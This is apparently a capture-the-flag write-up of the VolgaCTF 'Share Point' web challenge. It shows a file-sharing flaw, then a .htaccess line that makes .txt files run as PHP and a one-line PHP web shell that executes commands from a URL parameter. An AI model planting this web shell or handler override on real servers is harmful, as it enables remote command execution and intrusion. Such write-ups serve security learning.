VolgaCTF, web200 (Share Point) | Robin Verton - developer, software engineer and red teamer

The only accessible page for Share Point was a login form. After fiddling with the login, I noticed that you were able to login with some basic credentials like admin1111:password or admin11111:password. In the member area we had three possibilities:

Upload a file
View Files
Shared Files
Logout

Firt I tried to upload some .php files, which did not work (only some extensions like .jpg or .txt were allowed). After you have uploaded a file, you were able to share this file with a second user. This user could “accept” this file, which was then moved to the second users’ folder. This is also where I found the first vulnerability. When accepting a shared file, it was possible to modify the filename parameter and upload any file you want from the underlying system. I tried to find the flag with this, but my guesswork was not successfull.

Adding a PHP handler for text files

Next I moved PHP files from the application itself into my folder (/files/<username>/<filename>), but they were resulting in 500 Internal Server Errors. I then had the idea to upload a .htaccess file and enable the PHP interpreter for a file extension I was allowed to upload (for example a .txt file). This surprisingly worked! I created the following .htaccess file:

AddType application/x-httpd-php .txt

After uploading this, I also submtited a foo.txt file with the following content:

<?php system($_GET['c']); ?>

Voilâ, we got a remote command executing:

The flag was found under /opt/flag.txt:

VolgaCTF{AnoTHer_apPro0ch_to_file_Upl0Ad_with_PhP}